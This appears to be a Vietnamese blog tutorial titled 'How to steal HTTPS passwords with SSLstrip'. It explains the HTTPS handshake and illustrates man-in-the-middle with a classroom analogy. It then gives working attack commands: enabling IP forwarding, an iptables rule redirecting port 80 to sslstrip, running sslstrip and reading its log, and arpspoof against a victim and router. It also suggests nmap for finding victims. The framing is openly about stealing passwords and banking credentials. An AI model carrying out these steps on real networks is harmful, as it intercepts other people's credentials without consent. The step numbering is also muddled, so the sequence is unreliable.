Cách đánh cắp mật khẩu HTTPS bằng công cụ Sslstrip

Cách đánh cắp mật khẩu HTTPS bằng công cụ Sslstrip 


Tìm hiểu thêm chút về HTTPS .

HTTPS, viết tắt của Hypertext Transfer Protocol Secure, là một giao thức kết hợp giữa giao thức HTTP và giao thức bảo mật SSL hay TLS cho phép trao đổi thông tin một cách bảo mật trên Internet. Giao thức HTTPS thường được dùng trong các giao dịch nhạy cảm cần tính bảo mật cao.

Quá trình giao tiếp giữa client và server thông qua HTTPS

• 1. Client gửi yêu cầu (request) cho một trang bảo mật (secure page) (có URL bắt đầu với https://)
• 2. Server gửi lại cho client certificate của nó.
• 3. Client (trình duyệt web) tiến hành xác thực certificate này bằng cách kiểm tra (verify) tính hợp lệ của chữ ký số của CA được kèm theo certificate.
• Giả sử certificate đã được xác thực và còn hạn sử dụng hoặc client vẫn cố tình truy cập mặc dù Web browser đã cảnh báo rằng không thể tin cậy được certificate này (do là dạng self-signed SSL certificate hoặc certificate hết hiệu lực, thông tin trong certificate không đúng) thì mới xảy ra bước 4 sau.
• 4. Client tự tạo ra ngẫu nhiên một symmetric encryption key (hay session key), rồi sử dụng public key (lấy trong certificate) để mã hóa session key này và gửi về cho server.
• 5. Server sử dụng private key (tương ứng với public key trong certificate ở trên) để giải mã ra session key ở trên.
• 6. Sau đó, cả server và client đều sử dụng session key đó để mã hóa/giải mã các thông điệp trong suốt phiên truyền thông.

Và tất nhiên, các session key sẽ được tạo ra ngẫu nhiên và khác nhau trong mỗi phiên làm việc với server. Ngoài encryption thì cơ chế hashing sẽ được sử dụng để đảm bảo tính Integrity cho các thông điệp được trao đổi.

Vậy bạn có thể ăn cắp các thông tin nhạy cảm như mật khẩu hay ... [ Tùy các bạn nghĩ  , đôi khi là các thông tin như bank , web , ... ] , hay không ? Có một công cụ đơn giản nhưng hiệu quả đó là sslstrip . Và đương nhiên không chỉ có mỗi sslstrip mà trong quá trình này ta sẽ sử dụng thêm một số công cụ khác để hổ trợ

Cách đánh cắp mật khẩu HTTPS bằng công cụ Sslstrip

Ta cần chuẩn bị những gì :

• Linux 
• SSLStrip
• iptables
• tail 
• arpspoof
• Không cần biết làm thế nào để có những công cụ đó chỉ biết là nhất định phải có .

Chức năng của các công cụ này :

• Linux : không biết là gì thì vui lòng rời trang này nhé !
• sslstrip : Công cụ tấn công khai thác SSL
• iptables : iptables là một chương trình chạy ở không gian người dùng, cho phép người quản trị hệ thống có thể cấu hình các bảng của tường lửa trong nhân Linux (được cài đặt trong các mô đun Netfilter khác nhau) và lưu trữ các chuỗi, luật. Các mô đun nhân và chương trình khác nhau được áp dụng cho từng giao thức; iptables cho IPv4, ip6tables cho IPv6, arptables cho ARP, và ebtables cho Ethernet frames.
• tail  : Sử dụng để xem nội dung file
• arpspoof :  thực hiện các cuộc tấn công arp spoofing

Mô tả cách tấn công : 

Đầu tiên ta cần chuyển tiếp IP của nạn nhân đến Router thực sự . Vì ta khai thác mật khẩu , ... từ thông tin mà ta lừa được từ nạn nhân , tức lừa nạn nhân rằng ta là router và dụ nạn nhân gửi dữ liệu được mã hóa đến máy ta sau đó dùng sslstrip và khai thác thông tin trong dữ liệu đó . Nếu ta không chuyển tiếp IP thì khi nạn nhân gửi dữ liệu đến máy ta , dữ liệu đó sẽ bị chặn lại và nạn nhân sẽ bị mất kết nối , coi như toàn bộ cuộc tấn công trở thành công cốc .

Để dễ hiểu hơn ta lấy ví dụ sau :

Trong lớp có thằng Tí ( Victim ) và con Tèo ( Trang Web / host / ... ) thích nhau , nhưng nó lại ở hai dãy bàn khác nhau , thằng Tí ở dãy bàn 1 con Tèo dãy bàn ba và thằng chuyển thư là thằng Tôm ( Router ) . Tí thường gửi thư cho Tèo . Và  Mít ( Attacker ) là thằng với bản tính tò mò và đang ế dài cổ , muốn học chút kinh nghiệm từ hai đứa này và tò mò nó viết gì cho nhau . Nhưng Tí và Tèo đã có người vận chuyển trung gian là thằng Tôm - bạn thân và rất tin cậy - vậy làm sao đây .

A có cách . Chuyện là như này , Tôm là người vận chuyển nhưng vị trí từ Tôm đến Tí có thằng Mít ở giữa , vậy Mít nảy sinh ý định sẽ làm người trung gian tiếp giữa Tí và Tôm . Bằng cách lấy lòng tin của Tí , Mít đã lấy được thư . Ô cờ ê . Đọc thư thôi , đọc xong , nếu không chuyển cho thằng Tôm coi như hỏng nên Tí phải chuyển cho Tôm ( IP forwarding ) . Cứ thế Mít ngày càng có nhiều kinh nghiệm khi đọc được thư của Tí gửi cho Tèo . Và nay Mít đã có cô bạn gái đó là tấm lich dài dằng dặc cùng căn nhà đá ấm áp .

Cách đánh cắp mật khẩu HTTPS bằng công cụ Sslstrip

Bước 1 : IP forwarding

• Ta chạy lệnh sau :

echo 1 > /proc/sys/net/ipv4/ip_forward

• Nhớ là sau khi tấn công xong chạy lại lệnh này nhưng thay vì 1 ta nhập 0

• Ta chạy lênh sau :

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 4444

• Chức năng lênh trên là chuyển hướng các lưu lượng truy cập HTTP sang sslstrip 

Bước 3 : Lắng nghe :

• Chạy lệnh :

sslstrip -p -l 4444

• Lênh trên có chức năng lắng nghe các lưu lượng truy cập HTTP trên cổng 4444 được thiết lập ở bước 2 
• Trong đó -p là mặc định nên có cũng được mà không có cũng được

Bước 4 : tail -f sslstrip.log - Hiển thị các thông tin khai thác được 

• Chạy lệnh trên Terminal mới  :

arpspoof -i <card_interface> -t <ip_Victim> <IP_router>

• Đến đây lại nảy sinh vấn đề mới . IP của nạn nhân là gì ? IP Router là gì ? . 
• Đến đây coi như hoàn thành . Bây giờ ta chỉ việc xem những gì hiện lên tại cửa sổ ở bước 4 
• Xem tiếp 

 Cách đánh cắp mật khẩu HTTPS bằng công cụ Sslstrip


Cách tìm IP của nạn nhân : 

• Sử dụng nmap
• Sử dụng Zenmap 
• Hoặc sử dụng các công cụ khác  [ Sẽ có bài hướng dẫn ]

route

Một chú ý vừa được cập nhật : Các bạn chú ý giùm IT Việt Nam đó là hướng dẫn này chỉ đúng nếu như giao thức truyền tải mà web/dịch vụ đó sử dụng có chút gì đó gọi là vấn vương của http nhé .